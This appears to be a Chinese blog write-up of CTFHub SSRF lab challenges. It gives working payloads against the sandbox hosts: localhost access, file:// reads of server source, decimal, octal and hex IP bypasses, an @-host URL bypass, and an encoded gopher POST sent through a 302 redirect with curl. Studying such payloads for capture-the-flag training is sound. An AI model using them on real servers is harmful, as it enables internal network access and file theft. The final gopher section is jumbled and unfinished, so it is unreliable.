Ctfhub解题 web SSRF
介绍:记录解题过程
SSRF
其全称 :Server—Side Request Forgery :服务器端请求伪造
是一种由攻击者构造形成的由 服务器端发起请求的一个安全漏洞。一般情况下,攻击的目是外网没有办法访问的内网。
很多WEb应用都其提供了从其他服务器上获取数据的功能,使用指定的url,web 应用可以获取图片,下载文件,读取文件等。这个功能如果被恶意使用,可以利用存在缺陷的web引用做为代理,攻击远程和本地服务器。
原理:
服务端提供了从其他服务器应用获取数据的功能,且没有对目标地
址做过滤与限制
1.内网访问
尝试访问位于127.0.0.1的flag.php吧
- 访问得到flag
?url=127.0.0.1/flag.php
2.伪协议读取文件
尝试去读取一下Web目录下的flag.php吧
- 访问并查看源码得到flag
?url=file:///var/www/html/flag.php
3.端口扫描
来来来性感CTFHub在线扫端口,据说端口范围是8000-9000哦,
- BurpSuite端口扫描
2. 添加payload
- 得到开发端口
- 访问得到flag
4. URL Bypass
请求的URL中必须包含http://notfound.ctfhub.com,来尝试利用URL的一些特殊地方绕过这个限制吧
当后端程序通过不正确的正则表达式(比如将http之后到com为止的字符内容,也就是http://notfound.ctfhub.com,认为是访问请求的host地址时)对上述URL的内容进行解析的时候,很有可能会认为访问URL的host为http://notfound.ctfhub.com,而实际上这个URL所请求的内容都是127.0.0.1上的内容。
payload:
?url=http://notfound.ctfhub.com@127.0.0.1/flag.php
5.数字IP Bypass
这次ban掉了127以及172.不能使用点分十进制的IP了。但是又要访问127.0.0.1。该怎么办呢
8进制格式:0177.00.00.01
16进制格式:0x7f.0x0.0x0.0x1
10进制整数格式:2130706433
在linux下,0代表127.0.0.1,http://0进行请求127.0.0.1
?url=0177.00.00.01/flag.php
6.302跳转 Bypass
SSRF中有个很重要的一点是请求可能会跟随302跳转,尝试利用这个来绕过对IP的检测访问到位于127.0.0.1的flag.php吧
- 直接访问得flag
http://challenge-de917a53c55d656e.sandbox.ctfhub.com:10080/?url=127.0.0.1/flag.php
7.DNS重绑定 Bypass
关键词:DNS重绑定。剩下的自己来吧,也许附件中的链接能有些帮助
- 直接访问得flag
http://challenge-c8318776370e9d32.sandbox.ctfhub.com:10080/?url=127.0.0.1/flag.php
题目出错???
8.POST请求
这次是发一个HTTP POST请求.对了.ssrf是用php的curl实现的.并且会跟踪302跳转.加油吧骚年
- 访问查看源码
http://challenge-04e410b98639ad8b.sandbox.ctfhub.com:10080/?url=127.0.0.1/flag.php
<form action="/flag.php" method="post">
<input type="text" name="key">
<!-- Debug: key=d7c44bb3ec86a1948659e1d030520420-->
</form>
- 通过file://协议读取其他文件的源码,访问并查看源码
http://challenge-04e410b98639ad8b.sandbox.ctfhub.com:10080/?url=file:///var/www/html/flag.php
- flag.php源码:
<?php
error_reporting(0);
if ($_SERVER["REMOTE_ADDR"] != "127.0.0.1") {
echo "Just View From 127.0.0.1";
return;
}
$flag=getenv("CTFHUB");
$key = md5($flag);
if (isset($_POST["key"]) && $_POST["key"] == $key) {
echo $flag;
exit;
}
?>
<form action="/flag.php" method="post">
<input type="text" name="key">
<!-- Debug: key=<?php echo $key;?>-->
</form>
view-source:http://challenge-04e410b98639ad8b.sandbox.ctfhub.com:10080/?url=file:///var/www/html/index.php
- index.php源码:
<?php
error_reporting(0);
if (!isset($_REQUEST['url'])){
header("Location: /?url=_");
exit;
}
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $_REQUEST['url']);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_exec($ch);
curl_close($ch);
- 构造gopher数据
我们首先要通过{host}:{port}/index.php?url=http://127.0.0.1/302.php去跳转gopher的协议。
gopher的数据应该是这样:
gopher://127.0.0.1:80/_POST /flag.php HTTP/1.1
Host: 127.0.0.1:80
Content-Length: 36
Content-Type: application/x-www-form-urlencoded
key=7c84395afd9cbc2d937f0371b305e1a1
```php
curl -vvv 'http://challenge-04e410b98639ad8b.sandbox.ctfhub.com:10080/?url=http://127.0.0.1/302.php?url=%67%6f%70%68%65%72%3a%2f%2f%31%32%37%2e%30%2e%30%2e%31%3a%38%30%2f%5f%50%4f%53%54%20%2f%66%6c%61%67%2e%70%68%70%20%48%54%54%50%2f%31%2e%31%0a%48%6f%73%74%3a%20%31%32%37%2e%30%2e%30%2e%31%3a%38%30%0a%43%6f%6e%74%65%6e%74%2d%4c%65%6e%67%74%68%3a%20%33%36%09%0a%43%6f%6e%74%65%6e%74%2d%54%79%70%65%3a%20%61%70%70%6c%69%63%61%74%69%6f%6e%2f%78%2d%77%77%77%2d%66%6f%72%6d%2d%75%72%6c%65%6e%63%6f%64%65%64%0a%0a%6b%65%79%3d%37%63%38%34%33%39%35%61%66%64%39%63%62%63%32%64%39%33%37%66%30%33%37%31%62%33%30%35%65%31%61%31'
7c84395afd9cbc2d937f0371b305e1a1
url=gopher://127.0.0.1/_POST%252b/flag.php%252bHTTP/1.1
Host%25253a%252b127.0.0.1%25253a80
Content-Type%25253a%252bapplication/x-www-form-urlencoded
Content-Length%25253a%252b36
Content-Length: 522
key%25253dc3374ec7f142534b6cb20ec940f6433d HTTP/1.1
- 未完待续
- 参考
CTFHUB技能树-SSRF【持续更新】
版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。
文章由极客之音整理,本文链接:https://www.bmabk.com/index.php/post/92708.html
